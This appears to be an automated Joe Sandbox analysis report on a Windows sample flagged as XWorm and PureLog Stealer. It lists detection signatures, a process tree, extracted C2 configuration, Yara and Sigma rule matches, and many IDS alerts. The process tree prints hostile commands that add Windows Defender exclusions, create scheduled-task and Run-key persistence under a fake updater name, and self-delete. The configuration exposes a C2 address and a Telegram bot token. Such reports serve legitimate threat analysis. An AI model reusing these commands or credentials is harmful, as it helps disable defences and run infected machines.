Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1569488
MD5:7823e902900881094372948957825fe1
SHA1:297a663f3b64fb9863164d10ac698bef03dd3a0f
SHA256:92d36e5fb3fdbf10ad10c7880c40013c2e21b8a49e20720137d2b4851681233f
Tags:exeuser-Bitsight
Infos:

Detection

PureLog Stealer, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected PureLog Stealer
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates autostart registry keys with suspicious names
Creates multiple autostart registry keys
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6596 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7823E902900881094372948957825FE1)
    • file.exe (PID: 2852 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7823E902900881094372948957825FE1)
      • powershell.exe (PID: 5928 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 3684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 344 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 5316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6808 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\WindowsUpdaterConf.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 3684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3060 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsUpdaterConf.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 4852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3796 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsUpdaterConf" /tr "C:\Users\user\WindowsUpdaterConf.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 2872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WindowsUpdaterConf.exe (PID: 6184 cmdline: "C:\Users\user\WindowsUpdaterConf.exe" MD5: 7823E902900881094372948957825FE1)
          • WerFault.exe (PID: 6380 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6184 -s 1144 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 3796 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 6184 -ip 6184 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • cmd.exe (PID: 5640 cmdline: "cmd" /c timeout /t 1 && DEL /f file.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 5940 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • file.exe (PID: 5780 cmdline: "C:\Users\user\AppData\Roaming\file.exe" MD5: 7823E902900881094372948957825FE1)
    • WerFault.exe (PID: 6668 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5780 -s 1216 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • file.exe (PID: 3020 cmdline: "C:\Users\user\AppData\Roaming\file.exe" MD5: 7823E902900881094372948957825FE1)
    • WerFault.exe (PID: 1860 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3020 -s 1140 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • WindowsUpdaterConf.exe (PID: 5960 cmdline: C:\Users\user\WindowsUpdaterConf.exe MD5: 7823E902900881094372948957825FE1)
    • WerFault.exe (PID: 5184 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5960 -s 1204 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • WindowsUpdaterConf.exe (PID: 4040 cmdline: "C:\Users\user\WindowsUpdaterConf.exe" MD5: 7823E902900881094372948957825FE1)
    • WerFault.exe (PID: 3468 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 1164 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • WindowsUpdaterConf.exe (PID: 5688 cmdline: C:\Users\user\WindowsUpdaterConf.exe MD5: 7823E902900881094372948957825FE1)
    • WerFault.exe (PID: 5576 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 1148 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • WindowsUpdaterConf.exe (PID: 6024 cmdline: C:\Users\user\WindowsUpdaterConf.exe MD5: 7823E902900881094372948957825FE1)
    • WerFault.exe (PID: 2304 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 1132 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • WindowsUpdaterConf.exe (PID: 2756 cmdline: C:\Users\user\WindowsUpdaterConf.exe MD5: 7823E902900881094372948957825FE1)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["185.196.8.239"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "8070077125:AAEdRIyp1anHye9Y0jcV8uNF6U4mmijN8Pk", "Telegram Chatid": "1818813749", "Version": "XWorm V5.6"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
file.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\WindowsUpdaterConf.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        C:\Users\user\AppData\Roaming\file.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000002.1759365253.0000000005E50000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            00000001.00000002.4176352782.0000000002BD1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000000.00000000.1694062530.0000000000C32000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0000002B.00000002.4172310149.00000000042F5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                    Click to see the 10 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    0.2.file.exe.3719ccc.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                      0.2.file.exe.3719ccc.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                        0.2.file.exe.3719ccc.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                        • 0xe5b5:$s6: VirtualBox
                        • 0xe513:$s8: Win32_ComputerSystem
                        • 0x10ee4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                        • 0x10f81:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                        • 0x11096:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                        • 0xfe2d:$cnc4: POST / HTTP/1.1
                        0.2.file.exe.372e50c.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
                          0.2.file.exe.372e50c.1.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                            Click to see the 17 entries

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 2852, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 5928, ProcessName: powershell.exe
                            Sigma detected: Change PowerShell Policies to an Insecure Level
                            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 2852, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 5928, ProcessName: powershell.exe
                            Sigma detected: CurrentVersion Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\file.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 6596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\666999666
                            Sigma detected: Powershell Defender Exclusion
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 2852, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 5928, ProcessName: powershell.exe
                            Sigma detected: Startup Folder File Write
                            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 2852, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdaterConf.lnk
                            Sigma detected: Non Interactive PowerShell Process Spawned
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 2852, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 5928, ProcessName: powershell.exe

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-05T19:40:35.861908+010028536851A Network Trojan was detected192.168.2.449740149.154.167.220443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-05T19:40:49.279298+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:41:01.792137+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:41:06.078519+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:41:14.306493+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:41:26.820479+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:41:36.074500+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:41:39.346854+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:41:44.039426+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:41:44.186711+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:41:44.354657+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:41:49.930287+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:41:50.493925+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:41:50.604514+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:41:56.183674+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:41:56.328908+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:41:56.498022+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:42:06.073461+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:42:08.885531+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:42:12.117835+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:42:22.726539+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:42:22.868735+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:42:23.040475+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:42:23.183664+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:42:26.601407+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:42:28.023630+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:42:33.680034+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:42:36.096593+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:42:38.227034+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:42:38.418978+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:42:43.696326+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:42:43.888449+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:42:46.372475+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:42:58.883827+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:43:04.245042+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:43:04.437499+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:43:05.040102+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:43:06.096583+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:43:14.274398+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:43:14.415537+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:43:14.594513+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:43:14.834543+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:43:22.322408+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:43:24.696129+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:43:29.688528+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:43:29.881428+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:43:36.090598+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:43:40.196613+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:43:41.339455+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:43:42.024594+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:43:54.541105+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:43:56.823146+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:43:57.103007+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:44:06.093314+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:44:08.658761+010028528701Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-05T19:40:49.322470+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:41:01.794410+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:41:14.308474+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:41:26.822739+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:41:39.348559+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:41:44.042422+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:41:44.189182+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:41:44.357039+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:41:49.932460+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:41:50.504394+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:41:50.627833+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:41:50.797977+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:41:50.917747+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:41:56.186173+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:41:56.331341+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:41:56.501294+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:42:08.887117+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:42:12.119563+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:42:22.728656+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:42:22.871805+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:42:23.043784+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:42:23.186431+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:42:26.604303+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:42:28.025141+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:42:33.682516+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:42:38.229933+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:42:38.420604+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:42:43.704189+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:42:44.119844+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:42:46.375024+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:42:58.890884+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:43:04.246700+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:43:04.438814+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:43:05.042164+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:43:14.276672+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:43:14.417228+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:43:14.596237+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:43:14.839916+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:43:22.324503+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:43:24.698239+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:43:29.693242+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:43:29.883678+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:43:40.201444+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:43:41.341754+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:43:42.026533+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:43:54.547027+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:43:56.828046+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:43:57.108010+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            2024-12-05T19:44:08.659555+010028529231Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-05T19:41:06.078519+010028528741Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:41:36.074500+010028528741Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:42:06.073461+010028528741Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:42:36.096593+010028528741Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:43:06.096583+010028528741Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:43:36.090598+010028528741Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            2024-12-05T19:44:06.093314+010028528741Malware Command and Control Activity Detected185.196.8.2397000192.168.2.449742TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
